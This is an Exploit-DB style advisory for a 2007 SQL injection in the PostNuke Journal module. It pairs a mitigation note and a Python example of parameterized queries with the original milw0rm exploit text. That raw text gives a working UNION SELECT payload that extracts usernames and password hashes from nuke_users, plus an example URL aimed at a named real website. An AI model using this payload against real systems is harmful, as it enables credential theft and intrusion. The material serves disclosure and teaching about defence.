Vendor: PostNuke Journal
By: Ali Abbasi
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: PostNuke Journal
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PostNuke Journal

The vulnerability allows an attacker to perform SQL injection by manipulating the 'id' parameter in the 'index.php?module=v4bJournal&func=journal_comment' URL. By using a specially crafted payload, an attacker can retrieve sensitive information from the 'nuke_users' table.

Mitigation:

The vendor should sanitize and validate user input to prevent SQL injection attacks. Additionally, prepared statements or parameterized queries should be used to mitigate the risk of SQL injection.
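
The mitigation above, shown as an added example (not code from PostNuke, the v4bJournal module, or the advisory's authors): a concatenated query beside a validated, parameterized one. It uses Python with an in-memory SQLite database as a stand-in for the application's own database layer. The `journal_comments` table, its columns, the function names and all row values are constructed assumptions. Only `nuke_users`, `pn_uid`, `pn_uname`, `pn_pass` and the `id` parameter come from the page.

```python
import sqlite3

def make_db():
    """Constructed in-memory data; journal_comments is a hypothetical table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE nuke_users (pn_uid INTEGER, pn_uname TEXT, pn_pass TEXT);
        CREATE TABLE journal_comments (id INTEGER, author TEXT, body TEXT);
        INSERT INTO nuke_users VALUES (2, 'admin', 'constructed-hash');
        INSERT INTO journal_comments VALUES (1, 'alice', 'first entry');
    """)
    return db

def comments_concat(db, raw_id):
    """'Before': the request value becomes part of the SQL text."""
    sql = "SELECT id, author, body FROM journal_comments WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def comments_bound(db, raw_id):
    """'After': accept only a short ASCII decimal id, then bind it."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        return None  # caller should answer with a 400-style error
    sql = "SELECT id, author, body FROM journal_comments WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

# Constructed input with the same shape as the advisory's id value.
CRAFTED_ID = ("-1 UNION SELECT pn_uid, pn_uname, pn_pass "
              "FROM nuke_users WHERE pn_uid = 2")

if __name__ == "__main__":
    db = make_db()
    print("concat, id=1      :", comments_concat(db, "1"))
    print("concat, crafted id:", comments_concat(db, CRAFTED_ID))
    print("bound,  id=1      :", comments_bound(db, "1"))
    print("bound,  crafted id:", comments_bound(db, CRAFTED_ID))
```

Binding alone keeps the value out of the SQL text; the integer check additionally lets the handler reject a malformed id before it reaches the database.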
Source

Exploit-DB raw data:

----------------------------------------
PostNuke Journal
----------------------------------------
                                   
                    DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
       
   Greetz For All Y! UnderGround Group Members ( www.2600.ir )

    Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )

         Contact:     abbasi@ustmb.ac.ir


                                   {SQL BUG}



in 
    index.php?module=v4bJournal&func=journal_comment&id=(SQL)




------------------------------------------

         EXPLOIT BY :ABDUCTER

Greetz For ABDUCTER Real Friend Nanos (Nancy)

Contact:   ABDUCTER_MINDS@YAHOO.COM 
 


   index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*

EX:- 
http://www.arsfoodcourt.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*


U must register first ( You Must Register First )
-------------------------------------------

# milw0rm.com [2007-05-02]